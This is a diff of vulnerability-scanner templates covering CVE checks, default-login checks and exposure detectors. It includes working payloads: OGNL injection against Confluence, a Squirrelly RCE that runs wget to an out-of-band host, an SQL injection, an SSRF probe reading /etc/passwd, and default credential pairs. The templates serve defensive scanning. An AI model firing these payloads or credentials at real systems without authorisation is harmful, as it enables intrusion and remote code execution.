    - https://github.com/jaeles-project/jaeles-signatures/blob/e9595197c80521d64e31b846808095dd07c407e9/cves/elasctic-memory-leak-cve-2021-22145.yaml
    - https://nvd.nist.gov/vuln/detail/CVE-2021-22145
    - https://packetstormsecurity.com/files/163648/ElasticSearch-7.13.3-Memory-Disclosure.html
  tags: cve,cve2021,elascticsearch
 requests:
  - method: POST
    path:
      - '{{BaseURL}}/_bulk'
    headers:
      Content-Type: application/json
    body: |
      @
    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'root_cause'
          - 'truncated'
          - 'reason'
        part: body
        condition: and
      - type: status
        status:
          - 400
--- a/cves/2021/CVE-2021-22873.yaml
+++ b/cves/2021/CVE-2021-22873.yaml
@ -18,7 +18,9 @@ requests:
      - "{{BaseURL}}/revive/www/delivery/lg.php?dest=http://example.com"
      - "{{BaseURL}}/www/delivery/lg.php?dest=http://example.com"
    stop-at-first-match: true
    redirects: true
    max-redirects: 2
    matchers-condition: and
    matchers:
      - type: status
--- a/cves/2021/CVE-2021-24288.yaml
+++ b/cves/2021/CVE-2021-24288.yaml
@ -0,0 +1,20 @@
 id: CVE-2021-24288
 info:
  name: AcyMailing < 7.5.0 - Open Redirect
  author: 0x_Akoko
  severity: medium
  description: When using acymailing to subscribe to a newsletter, you make a POST request with various parameters. Turning that to a GET request and adding the parameters as GET parameters, you can successfully go through with the subscription.
  reference: https://wpscan.com/vulnerability/56628862-1687-4862-9ed4-145d8dfbca97
  tags: wordpress,cve,cve2021,redirect,wp-plugin
 requests:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?page=acymailing_front&ctrl=frontusers&noheader=1&user[email]=example@mail.com&ctrl=frontusers&task=subscribe&option=acymailing&redirect=https://example.com&ajax=0&acy_source=widget%202&hiddenlists=1&acyformname=formAcym93841&acysubmode=widget_acym"
    matchers:
      - type: regex
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
        part: header
--- a/cves/2021/CVE-2021-24495.yaml
+++ b/cves/2021/CVE-2021-24495.yaml
@ -5,6 +5,7 @@ info:
  author: johnjhacking
  severity: medium
  tags: cve,cve2021,wp-plugin,wordpress,xss
  description: The Marmoset Viewer WordPress plugin before 1.9.3 does not property sanitize, validate or escape the 'id' parameter before outputting back in the page, leading to a reflected Cross-Site Scripting issue.
  reference:
    - https://johnjhacking.com/blog/cve-2021-24495-improper-neutralization-of-input-during-web-page-generation-on-id-parameter-in-wordpress-marmoset-viewer-plugin-versions-1.9.3-leads-to-reflected-cross-site-scripting/
    - https://wordpress.org/plugins/marmoset-viewer/#developers
--- a/cves/2021/CVE-2021-26084.yaml
+++ b/cves/2021/CVE-2021-26084.yaml
@ -0,0 +1,47 @@
 id: CVE-2021-26084
 info:
  author: dhiyaneshDk,philippedelteil
  severity: critical
  name: Confluence Server OGNL injection - RCE
  description: In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance. The vulnerable endpoints can be accessed by a non-administrator user or unauthenticated user if ‘Allow people to sign up to create their account’ is enabled. To check whether this is enabled go to COG > User Management > User Signup Options. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.
  tags: cve,cve2021,rce,confluence
  reference:
    - https://jira.atlassian.com/browse/CONFSERVER-67940
    - https://github.com/httpvoid/CVE-Reverse/tree/master/CVE-2021-26084
    - https://nvd.nist.gov/vuln/detail/CVE-2021-26084
    - https://github.com/Udyz/CVE-2021-26084
 requests:
  - raw:
      - |
        POST /{{path}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        queryString=aaaa\u0027%2b#{16*8787}%2b\u0027bbb
    payloads:
      path:
        - pages/createpage-entervariables.action?SpaceKey=x
        - confluence/pages/createpage-entervariables.action?SpaceKey=x
        - wiki/pages/createpage-entervariables.action?SpaceKey=x
        - pages/doenterpagevariables.action
        - pages/createpage.action?spaceKey=myproj
        - pages/templates2/viewpagetemplate.action
        - pages/createpage-entervariables.action
        - template/custom/content-editor
        - templates/editor-preload-container
        - users/user-dark-features
    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        part: body
        words:
          - 'value="aaaa{140592=null}'
--- a/cves/2021/CVE-2021-28918.yaml
+++ b/cves/2021/CVE-2021-28918.yaml
@ -0,0 +1,33 @@
 id: CVE-2021-28918
 info:
  name: Netmask NPM Package SSRF
  author: johnjhacking
  severity: critical
  description: Improper input validation of octal strings in netmask npm package allows unauthenticated remote attackers to perform indeterminate SSRF, RFI, and LFI attacks on many of the dependent packages. A remote unauthenticated attacker can bypass packages relying on netmask to filter IPs and reach critical VPN or LAN hosts.
  tags: cve,cve2021,npm,netmask,ssrf,lfi
  reference:
    - https://github.com/sickcodes/security/blob/master/advisories/SICK-2021-011.md
    - https://nvd.nist.gov/vuln/detail/CVE-2021-28918
    - https://github.com/advisories/GHSA-pch5-whg9-qr2r
 requests:
  - method: GET
    path:
      - "{{BaseURL}}/?url=http://0177.0.0.1/server-status"
      - "{{BaseURL}}/?host=http://0177.0.0.1/server-status"
      - "{{BaseURL}}/?file=http://0177.0.0.1/etc/passwd"
    stop-at-first-match: true
    matchers-condition: or
    matchers:
      - type: word
        part: body
        words:
          - "Apache Server Status"
          - "Server Version"
        condition: and
      - type: regex
        regex:
          - "root:.*:0:0:"
--- a/cves/2021/CVE-2021-31856.yaml
+++ b/cves/2021/CVE-2021-31856.yaml
@ -0,0 +1,28 @@
 id: CVE-2021-31856
 info:
  name: Layer5 Meshery 0.5.2 SQLi
  author: princechaddha
  severity: critical
  description: A SQL Injection vulnerability in the REST API in Layer5 Meshery 0.5.2 allows an attacker to execute arbitrary SQL commands via the /experimental/patternfiles endpoint (order parameter in GetMesheryPatterns in models/meshery_pattern_persister.go).
  reference:
    - https://github.com/ssst0n3/CVE-2021-31856
    - https://nvd.nist.gov/vuln/detail/CVE-2021-31856
  tags: sqli,cve,cve2021
 requests:
  - method: GET
    path:
      - "{{BaseURL}}/api/experimental/patternfile?order=id%3Bselect(md5('nuclei'))&page=0&page_size=0"
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "709b38b27304df6257a86a60df742c4c"
        part: body
      - type: status
        status:
          - 200
--- a/cves/2021/CVE-2021-32819.yaml
+++ b/cves/2021/CVE-2021-32819.yaml
@ -0,0 +1,26 @@
 id: CVE-2021-32819
 info:
  name: Nodejs squirrelly template engine RCE
  author: pikpikcu
  severity: critical
  description: |
    Squirrelly is a template engine implemented in JavaScript that works out of the box with ExpressJS. Squirrelly mixes pure template data with engine configuration
    options through the Express render API. By overwriting internal configuration options remote code execution may be triggered in downstream applications. There is
    currently no fix for these issues as of the publication of this CVE. The latest version of squirrelly is currently 8.0.8. For complete details refer to the referenced GHSL-2021-023.
  reference:
    - https://securitylab.github.com/advisories/GHSL-2021-023-squirrelly/
    - https://www.linuxlz.com/aqld/2331.html
    - https://blog.diefunction.io/vulnerabilities/ghsl-2021-023
  tags: cve,cve2021,nodejs,rce,oob
 requests:
  - method: GET
    path:
      - '{{BaseURL}}/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%7C%7C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://{{interactsh-url}}%27);//'
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"
--- a/cves/2021/CVE-2021-34370.yaml
+++ b/cves/2021/CVE-2021-34370.yaml
@ -0,0 +1,23 @@
 id: CVE-2021-34370
 info:
  name: Accela Civic Platform 21.1 - Open Redirect & XSS
  author: 0x_Akoko
  severity: medium
  description: Accela Civic Platform Cross-Site-Scripting and Open Redirect <= 21.1
  reference:
    - https://www.exploit-db.com/exploits/49990
    - https://nvd.nist.gov/vuln/detail/CVE-2021-34370
    - https://www.accela.com/civic-platform/
  tags: xss,redirect,cve,cve2021
 requests:
  - method: GET
    path:
      - "{{BaseURL}}/ssoAdapter/logoutAction.do?servProvCode=SAFVC&successURL=https://example.com/"
    matchers:
      - type: regex
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
        part: header
--- a/default-logins/abb/cs141-default-login.yaml
+++ b/default-logins/abb/cs141-default-login.yaml
@ -0,0 +1,65 @@
 id: cs141-default-login
 info:
  name: CS141 SNMP Module Default Credentials
  author: socketz
  severity: medium
  reference: https://www.generex.de/media/pages/packages/documents/manuals/f65348d5b6-1628841637/manual_CS141_en.pdf
  tags: hiawatha,iot,default-login
 requests:
  - raw:
      - |
        POST /api/login HTTP/1.1
        Host: {{Hostname}}
        Content-Length: 44
        Accept: application/json, text/plain, */*
        Content-Type: application/json
        Accept-Encoding: gzip, deflate
        Accept-Language: en,es-ES;q=0.9,es;q=0.8
        Connection: close
        {"userName":"admin","password":"cs141-snmp"}
      - |
        POST /api/login HTTP/1.1
        Host: {{Hostname}}
        Content-Length: 44
        Accept: application/json, text/plain, */*
        Content-Type: application/json
        Accept-Encoding: gzip, deflate
        Accept-Language: en,es-ES;q=0.9,es;q=0.8
        Connection: close
        {"userName":"engineer","password":"engineer"}
      - |
        POST /api/login HTTP/1.1
        Host: {{Hostname}}
        Content-Length: 44
        Accept: application/json, text/plain, */*
        Content-Type: application/json
        Accept-Encoding: gzip, deflate
        Accept-Language: en,es-ES;q=0.9,es;q=0.8
        Connection: close
        {"userName":"guest","password":"guest"}
    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'accessToken'
          - 'application/json'
        condition: and
        part: header
      - type: status
        status:
          - 200
    extractors:
      - type: kval
        kval:
          - accessToken
--- a/default-logins/aem/adobe-aem-default-credentials.yaml
+++ b/default-logins/aem/adobe-aem-default-credentials.yaml
@ -50,7 +50,7 @@ requests:
        - password
    attack: pitchfork  # Available options: sniper, pitchfork and clusterbomb
-
+    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: status
--- a/default-logins/vidyo/vidyo-default-credentials.yaml
+++ b/default-logins/vidyo/vidyo-default-credentials.yaml
@ -0,0 +1,54 @@
 id: vidyo-default-credentials
 info:
  name: Vidyo Default Credentials
  author: izn0u
  severity: medium
  description: test for default cred super:password
  reference: https://support.vidyocloud.com/hc/en-us/articles/226265128
  tags: vidyo,default-login
 requests:
  - raw:
      - |
        GET /super/login.html?lang=en HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
      - |
        POST /super/super_security_check;jsessionid={{session}}?csrf_tkn={{csrf_tkn}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Origin: {{BaseURL}}
        Referer: {{RootURL}}/super/login.html?lang=en
        Cookie: JSESSIONID={{session}} ; VidyoPortalSuperLanguage=en
        username=super&password=password
    extractors:
      - type: regex
        name: csrf_tkn
        group: 1
        part: body
        internal: true
        regex:
          - 'csrf_tkn=([A-Za-z0-9.-]+)'
      - type: kval
        name: session
        internal: true
        part: header
        kval:
          - JSESSIONID
    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "/super/index.html"
      - type: status
        status:
          - 302
--- a/default-logins/wso2/wso2-default-password.yaml
+++ b/default-logins/wso2/wso2-default-password.yaml
@ -0,0 +1,28 @@
 id: wso2-management-console-default-password
 info:
  name: WSO2 Management Console Default Password
  author: cocxanh
  severity: high
  reference: https://docs.wso2.com/display/UES100/Accessing+the+Management+Console
  tags: default-login,wso2
 requests:
  - raw:
      - |
        POST /carbon/admin/login_action.jsp HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Accept-Language: en-US,en;q=0.9
        Connection: close
        Content-Length: 29
        username=admin&password=admin
    redirects: false
    matchers:
      - type: word
        words:
          - "/carbon/admin/index.jsp?loginStatus=true"
          - "JSESSIONID"
        part: header
        condition: and
--- a/exposed-panels/adminer-panel.yaml
+++ b/exposed-panels/adminer-panel.yaml
@ -22,6 +22,7 @@ requests:
      - '{{BaseURL}}/sql.php'
      - '{{BaseURL}}/wp-content/plugins/adminer/adminer.php'
    stop-at-first-match: true
    matchers-condition: and
    matchers:
--- a/exposed-panels/cisco-security-details.yaml
+++ b/exposed-panels/cisco-security-details.yaml
@ -1,11 +1,11 @@
-id: cisco-security-details
+id: cisco-meraki-exposure
 info:
-  name: Cisco Meraki cloud & Security Appliance details
+  name: Cisco Meraki cloud & security Appliances Information Disclosure
-  author: dhiyaneshDK
+  author: dhiyaneshDK,r3naissance
  severity: info
  reference: https://www.exploit-db.com/ghdb/6708
-  tags: panel,cisco
+  tags: panel,cisco,meraki,disclosure
 requests:
  - method: GET
@ -17,6 +17,9 @@ requests:
      - type: word
        words:
          - 'Your client connection'
          - 'This security appliance is directly connected to a local network'
        condition: and
      - type: status
        status:
          - 200
--- a/exposed-panels/grails-database-admin-console.yaml
+++ b/exposed-panels/grails-database-admin-console.yaml
@ -13,7 +13,13 @@ requests:
      - '{{BaseURL}}/dbconsole/'
      - '{{BaseURL}}/h2-console/'
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "<title>H2 Console</title>"
      - type: word
        words:
          - "Sorry, remote connections ('webAllowOthers') are disabled on this server"
        negative: true
--- a/exposed-panels/jira-detect.yaml
+++ b/exposed-panels/jira-detect.yaml
@ -13,6 +13,7 @@ requests:
      - "{{BaseURL}}/jira/secure/Dashboard.jspa"
      - "{{BaseURL}}/login.jsp"
    stop-at-first-match: true
    redirects: true
    max-redirects: 2
    matchers:
--- a/exposed-panels/phpmyadmin-panel.yaml
+++ b/exposed-panels/phpmyadmin-panel.yaml
@ -22,10 +22,12 @@ requests:
      - "{{BaseURL}}/xampp/phpmyadmin/"
      - "{{BaseURL}}/phpMyAdmin/"
    stop-at-first-match: true
    matchers:
      - type: word
        words:
          - "<title>phpMyAdmin"
          - "pmahomme"
    extractors:
      - type: regex
--- a/exposed-panels/setup-page-exposure.yaml
+++ b/exposed-panels/setup-page-exposure.yaml
@ -14,6 +14,8 @@ requests:
      - '{{BaseURL}}/zp/zp-core/setup/index.php'
      - '{{BaseURL}}/gallery/zp-core/setup/index.php'
      - '{{BaseURL}}/zenphoto/zp-core/setup/index.php'
    stop-at-first-match: true
    matchers:
      - type: word
        words:
--- a/exposed-panels/sphider-login.yaml
+++ b/exposed-panels/sphider-login.yaml
@ -14,6 +14,7 @@ requests:
      - '{{BaseURL}}/sphider/admin/admin.php'
      - '{{BaseURL}}/search/admin/admin.php'
    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
--- a/exposures/apis/swagger-api.yaml
+++ b/exposures/apis/swagger-api.yaml
@ -51,6 +51,7 @@ requests:
      - "{{BaseURL}}/api/v1/swagger-ui/swagger.yaml"
      - "{{BaseURL}}/swagger-resources/restservices/v2/api-docs"
    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
--- a/exposures/apis/wadl-api.yaml
+++ b/exposures/apis/wadl-api.yaml
@ -17,26 +17,27 @@ requests:
      - "{{BaseURL}}/api/application.wadl"
      - "{{BaseURL}}/api/v1/application.wadl"
      - "{{BaseURL}}/api/v2/application.wadl"
    stop-at-first-match: true
    matchers:
      - name: http-get
        type: word
        words:
          - "This is simplified WADL with user and core resources only"
-          - "\"http://jersey.java.net/\""
+          - "http://jersey.java.net"
          - "http://wadl.dev.java.net/2009/02"
-        condition: or
+
        part: body
  - method: OPTIONS
    path:
      - "{{BaseURL}}"
      - "{{BaseURL}}/api/v1"
      - "{{BaseURL}}/api/v2"
    stop-at-first-match: true
    matchers:
      - name: http-options
        type: word
        words:
          - "This is simplified WADL with user and core resources only"
-          - "\"http://jersey.java.net/\""
+          - "http://jersey.java.net"
          - "http://wadl.dev.java.net/2009/02"
        condition: or
        part: body
--- a/exposures/configs/dbeaver-credentials.yaml
+++ b/exposures/configs/dbeaver-credentials.yaml
@ -24,3 +24,7 @@ requests:
        words:
          - "application/octet-stream"
        part: header
      - type: dsl
        dsl:
          - 'len(body) > 2'
--- a/exposures/configs/docker-compose-config.yaml
+++ b/exposures/configs/docker-compose-config.yaml
@ -19,6 +19,7 @@ requests:
      - "{{BaseURL}}/docker-compose-dev.yml"
      - "{{BaseURL}}/docker-compose.override.yml"
    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: dsl
--- a/exposures/configs/git-config-nginxoffbyslash.yaml
+++ b/exposures/configs/git-config-nginxoffbyslash.yaml
@ -22,8 +22,8 @@ requests:
      - '{{BaseURL}}/events../.git/config'
      - '{{BaseURL}}/media../.git/config'
      - '{{BaseURL}}/lib../.git/config'
-    headers:
+
-      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
+    stop-at-first-match: true
    matchers:
      - type: word
        words:
--- a/exposures/files/axis-happyaxis.yaml
+++ b/exposures/files/axis-happyaxis.yaml
@ -14,6 +14,7 @@ requests:
      - "{{BaseURL}}/axis2-web/HappyAxis.jsp"
      - "{{BaseURL}}/happyaxis.jsp"
    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
--- a/exposures/tokens/generic/general-tokens.yaml
+++ b/exposures/tokens/generic/general-tokens.yaml
@ -29,6 +29,7 @@ requests:
          - '(?i)password(lessauth|requirementsashtmllist|emailnotfoundmessage|label|errormessage|message|_checkemail_title|_newfield_retype|_text_new|login_submit|_has_expired_title|_has_expired_text|_error|_hint|_strength)'
          - '(?i)(!native)|(.*keybindings)'
          - '(?i)(layout|a)key'
          - '(?i)token_expires_in'
        condition: or
        negative: true
--- a/fuzzing/adminer-panel-fuzz.yaml
+++ b/fuzzing/adminer-panel-fuzz.yaml
@ -25,7 +25,7 @@ requests:
    attack: sniper
    threads: 50
-
+    stop-at-first-match: true
    matchers-condition: and
    matchers:
--- a/fuzzing/header-command-injection.yaml
+++ b/fuzzing/header-command-injection.yaml
@ -18,8 +18,9 @@ requests:
      header: helpers/payloads/request-headers.txt
      payload: helpers/payloads/command-injection.txt
    attack: clusterbomb
    redirects: true
    redirects: true
    stop-at-first-match: true
    matchers-condition: or
    matchers:
      - type: word
--- a/fuzzing/mdb-database-file.yaml
+++ b/fuzzing/mdb-database-file.yaml
@ -22,7 +22,7 @@ requests:
    attack: sniper
    threads: 50
    max-size: 500 # Size in bytes - Max Size to read from server response
-
+    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: binary
--- a/fuzzing/wordpress-weak-credentials.yaml
+++ b/fuzzing/wordpress-weak-credentials.yaml
@ -22,7 +22,7 @@ requests:
      passwords: helpers/wordlists/wp-passwords.txt
    threads: 50
    attack: clusterbomb
-
+    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: status
--- a/miscellaneous/htaccess-config.yaml
+++ b/miscellaneous/htaccess-config.yaml
@ -16,6 +16,7 @@ requests:
      - "{{BaseURL}}/a.htaccess"
      - "{{BaseURL}}/htaccess_for_page_not_found_redirects.htaccess"
    stop-at-first-match: true
    matchers:
      - type: word
        words:
--- a/miscellaneous/missing-csp.yaml
+++ b/miscellaneous/missing-csp.yaml
@ -1,17 +0,0 @@
 id: missing-csp
 info:
  name: CSP Not Enforced
  author: geeknik
  severity: info
  description: Checks if there is a CSP header
  tags: misc,generic
 requests:
  - method: GET
    path:
      - '{{BaseURL}}'
    redirects: true
    matchers:
      - type: dsl
        dsl:
          - '!contains(tolower(all_headers), ''content-security-policy'')'
--- a/miscellaneous/missing-hsts.yaml
+++ b/miscellaneous/missing-hsts.yaml
@ -1,17 +0,0 @@
 id: missing-hsts
 info:
  name: Strict Transport Security Not Enforced
  author: Dawid Czarnecki
  severity: info
  description: Checks if the HSTS is enabled by looking for Strict Transport Security response header.
  tags: misc,generic
 requests:
  - method: GET
    path:
      - '{{BaseURL}}'
    redirects: true
    matchers:
      - type: dsl
        dsl:
          - '!contains(tolower(all_headers), ''strict-transport-security'')'
--- a/miscellaneous/missing-x-content-type-options.yaml
+++ b/miscellaneous/missing-x-content-type-options.yaml
@ -1,18 +0,0 @@
 id: missing-x-content-type-options
 info:
  name: X-Content-Type-Options unidentified
  author: G4L1T0 and @convisoappsec
  severity: info
  description: Check for X-Content-Type-Options header
  tags: misc,generic
 requests:
  - method: GET
    path:
      - '{{BaseURL}}'
    redirects: true
    matchers:
      - type: dsl
        dsl:
          - '!contains(tolower(all_headers), ''x-content-type-options'')'
--- a/miscellaneous/missing-x-frame-options.yaml
+++ b/miscellaneous/missing-x-frame-options.yaml
@ -1,19 +0,0 @@
 id: missing-x-frame-options
 info:
  name: Clickjacking (Missing XFO header)
  author: kurohost
  severity: low
  tags: misc,generic
 requests:
  - method: GET
    path:
      - "{{BaseURL}}"
    redirects: true
    max-redirects: 2
    matchers:
      - type: dsl
        dsl:
          - "!contains(tolower(all_headers), 'x-frame-options')"
--- a/miscellaneous/phpmyadmin-setup.yaml
+++ b/miscellaneous/phpmyadmin-setup.yaml
@ -18,6 +18,7 @@ requests:
      - "{{BaseURL}}/xampp/phpmyadmin/scripts/setup.php"
      - "{{BaseURL}}/sysadmin/phpMyAdmin/scripts/setup.php"
    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
--- a/miscellaneous/unpatched-coldfusion.yaml
+++ b/miscellaneous/unpatched-coldfusion.yaml
@ -20,6 +20,7 @@ requests:
      - "{{BaseURL}}/cfide-scripts/ajax/package/cfajax.js"
      - "{{BaseURL}}/cfmx/CFIDE/scripts/ajax/package/cfajax.js"
    stop-at-first-match: true
    matchers-condition: and
    matchers:
--- a/misconfiguration/aem/aem-default-get-servlet.yaml
+++ b/misconfiguration/aem/aem-default-get-servlet.yaml
@ -66,6 +66,8 @@ requests:
      - '{{BaseURL}}///etc.children.json/FNZ.html'
      - '{{BaseURL}}///etc.children.json/FNZ.png'
      - '{{BaseURL}}///etc.children.json/FNZ.ico'
    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: status
--- a/misconfiguration/aem/aem-querybuilder-internal-path-read.yaml
+++ b/misconfiguration/aem/aem-querybuilder-internal-path-read.yaml
@ -16,6 +16,7 @@ requests:
      - '{{BaseURL}}/bin/querybuilder.json.css?path=/home&p.hits=full&p.limit=-1'
      - '{{BaseURL}}/bin/querybuilder.json.css?path=/etc&p.hits=full&p.limit=-1'
    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: status
--- a/misconfiguration/drupal/drupal-user-enum-ajax.yaml
+++ b/misconfiguration/drupal/drupal-user-enum-ajax.yaml
@ -13,9 +13,8 @@ requests:
      - "{{BaseURL}}/views/ajax/autocomplete/user/a"
      - "{{BaseURL}}/?q=admin/views/ajax/autocomplete/user/a"
      - "{{BaseURL}}/?q=views/ajax/autocomplete/user/a"
    headers:
      User-Agent: "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0"
    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
--- a/misconfiguration/drupal/drupal-user-enum-redirect.yaml
+++ b/misconfiguration/drupal/drupal-user-enum-redirect.yaml
@ -13,17 +13,19 @@ requests:
      - "{{BaseURL}}/user/1"
      - "{{BaseURL}}/user/2"
      - "{{BaseURL}}/user/3"
-    headers:
+
-      User-Agent: "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0"
+    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - '(?i)Location: http(s|):\/\/[\w\.\-]+(\/ar|\/en|)\/users\/\w+'
        part: header
      - type: status
        status:
          - 301
    extractors:
      - type: regex
        part: header
--- a/misconfiguration/http-missing-security-headers.yaml
+++ b/misconfiguration/http-missing-security-headers.yaml
@ -0,0 +1,127 @@
 id: http-missing-security-headers
 info:
  name: HTTP Missing Security Headers
  author: socketz,geeknik,G4L1T0,convisoappsec,kurohost,dawid-czarnecki
  severity: info
  description: It searches missing security headers, but obviously, could be so less generic and could be useless for Bug Bounty.
  tags: misconfig,generic
 requests:
  - method: GET
    path:
      - "{{BaseURL}}"
    redirects: true
    max-redirects: 3
    matchers-condition: or
    matchers:
      - type: regex
        name: strict-transport-security
        regex:
          - "(?i)strict-transport-security"
        negative: true
        part: header
      - type: regex
        name: content-security-policy
        regex:
          - "(?i)content-security-policy"
        negative: true
        part: header
      - type: regex
        name: x-frame-options
        regex:
          - "(?i)x-frame-options"
        negative: true
        part: header
      - type: regex
        name: x-content-type-options
        regex:
          - "(?i)x-content-type-options"
        negative: true
        part: header
      - type: regex
        name: x-permitted-cross-domain-policies
        regex:
          - "(?i)x-permitted-cross-domain-policies"
        negative: true
        part: header
      - type: regex
        name: referrer-policy
        regex:
          - "(?i)referrer-policy"
        negative: true
        part: header
      - type: regex
        name: clear-site-data
        regex:
          - "(?i)clear-site-data"
        negative: true
        part: header
      - type: regex
        name: cross-origin-embedder-policy
        regex:
          - "(?i)cross-origin-embedder-policy"
        negative: true
        part: header
      - type: regex
        name: cross-origin-opener-policy
        regex:
          - "(?i)cross-origin-opener-policy"
        negative: true
        part: header
      - type: regex
        name: cross-origin-resource-policy
        regex:
          - "(?i)cross-origin-resource-policy"
        negative: true
        part: header
      - type: regex
        name: access-control-allow-origin
        regex:
          - "(?i)access-control-allow-origin"
        negative: true
        part: header
      - type: regex
        name: access-control-allow-credentials
        regex:
          - "(?i)access-control-allow-credentials"
        negative: true
        part: header
      - type: regex
        name: access-control-expose-headers
        regex:
          - "(?i)access-control-expose-headers"
        negative: true
        part: header
      - type: regex
        name: access-control-max-age
        regex:
          - "(?i)access-control-max-age"
        negative: true
        part: header
      - type: regex
        name: access-control-allow-methods
        regex:
          - "(?i)access-control-allow-methods"
        negative: true
        part: header
      - type: regex
        name: access-control-allow-headers
        regex:
          - "(?i)access-control-allow-headers"
--- a/misconfiguration/kubernetes/kubernetes-metrics.yaml
+++ b/misconfiguration/kubernetes/kubernetes-metrics.yaml
@ -0,0 +1,29 @@
 id: kubernetes-metrics
 info:
  name: Detect Kubernetes Exposed Metrics
  author: pussycat0x
  severity: low
  description: Information Disclosure of Garbage Collection
  tags: kubernetes,exposure,devops
  reference: https://kubernetes.io/docs/concepts/cluster-administration/system-metrics/#metrics-in-kubernetes
 requests:
  - method: GET
    path:
      - "{{BaseURL}}/metrics"
    matchers-condition: and
    matchers:
      - type: word
        part: body
        condition: and
        words:
          - "namespace"
          - "HELP"
          - "TYPE"
          - "kube"
      - type: status
        status:
          - 200
--- a/misconfiguration/kubernetes/kubernetes-pods.yaml
+++ b/misconfiguration/kubernetes/kubernetes-pods.yaml
@ -13,16 +13,18 @@ requests:
    path:
      - '{{BaseURL}}/pods'
      - '{{BaseURL}}/api/v1/pods'
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "apiVersion"
-        part: body
+
      - type: word
        words:
          - "application/json"
        part: header
      - type: status
        status:
          - 200
--- a/misconfiguration/kubernetes/kubernetes-resource-report.yaml
+++ b/misconfiguration/kubernetes/kubernetes-resource-report.yaml
@ -0,0 +1,24 @@
 id: kubernetes-resource-report
 info:
  name: Detect Overview Kubernetes Resource Report
  author: pussycat0x
  severity: medium
  description: Information Disclosure of Kubernetes Resource Report
  tags: kubernetes,exposure
 requests:
  - method: GET
    path:
      - "{{BaseURL}}"
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Overview - Kubernetes Resource Report"
      - type: status
        status:
          - 200
--- a/misconfiguration/node-exporter-metrics.yaml
+++ b/misconfiguration/node-exporter-metrics.yaml
@ -0,0 +1,26 @@
 id: node-exporter-metrics
 info:
  name: Detect Node Exporter Metrics
  author: pussycat0x
  severity: low
  description: Information Disclosure of Garbage Collection
  tags: node,exposure,debug
 requests:
  - method: GET
    path:
      - "{{BaseURL}}/metrics"
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "node_cooling_device"
          - "node_network"
        condition: and
      - type: status
        status:
          - 200
--- a/misconfiguration/php-errors.yaml
+++ b/misconfiguration/php-errors.yaml
@ -2,31 +2,39 @@ id: php_errors
 info:
  name: PHP errors
-  author: w4cky_
+  author: w4cky_,geeknik
  severity: info
-  tags: debug
+  tags: debug,php
 requests:
  - method: GET
    path:
      - "{{BaseURL}}"
-    matchers:
+    extractors:
-      - type: word
+      - type: regex
-        words:
+        regex:
-          - "Fatal error"
+          - '(?i)Fatal error'
-          - "Call to undefined method"
+          - '(?i)Call to undefined method'
-          - "You have an error in your SQL syntax;"
+          - '(?i)You have an error in your SQL syntax'
-          - "MySQL server version for the right syntax to use near"
+          - '(?i)MySQL server version for the right syntax to use near'
-          - "PHP Warning"
+          - '(?i)MySQL cannot create a temporary file'
-          - "PHP Error"
+          - '(?i)PHP (Warning|Error)'
-          - "Warning: mysql_connect():"
+          - '(?i)Warning\: (pg|mysql)_(query|connect)\(\)'
-          - "Warning: mysql_query()"
+          - '(?i)failed to open stream\:'
-          - "Warning: pg_connect():"
+          - '(?i)SAFE MODE Restriction in effect'
-          - "failed to open stream: HTTP request failed"
+          - '(?i)Cannot modify header information'
-          - "SAFE MODE Restriction in effect."
+          - '(?i)ORA-00921\: unexpected end of SQL command'
-          - "Cannot modify header information"
+          - '(?i)ORA-00933\: SQL command not properly ended'
-          - "ORA-00921: unexpected end of SQL command"
+          - '(?i)ORA-00936\: missing expression'
-          - "ORA-00933: SQL command not properly ended"
+          - '(?i)ORA-12541\: TNS\:no listener'
-          - "ORA-00936: missing expression"
+          - '(?i)uncaught exception'
-          - "ORA-12541: TNS:no listener"
+          - '(?i)include_path'
          - '(?i)undefined index'
          - '(?i)undefined variable\:'
          - '(?i)stack trace\:'
          - '(?i)expects parameter [0-9]*'
          - '(?i)Debug Trace'
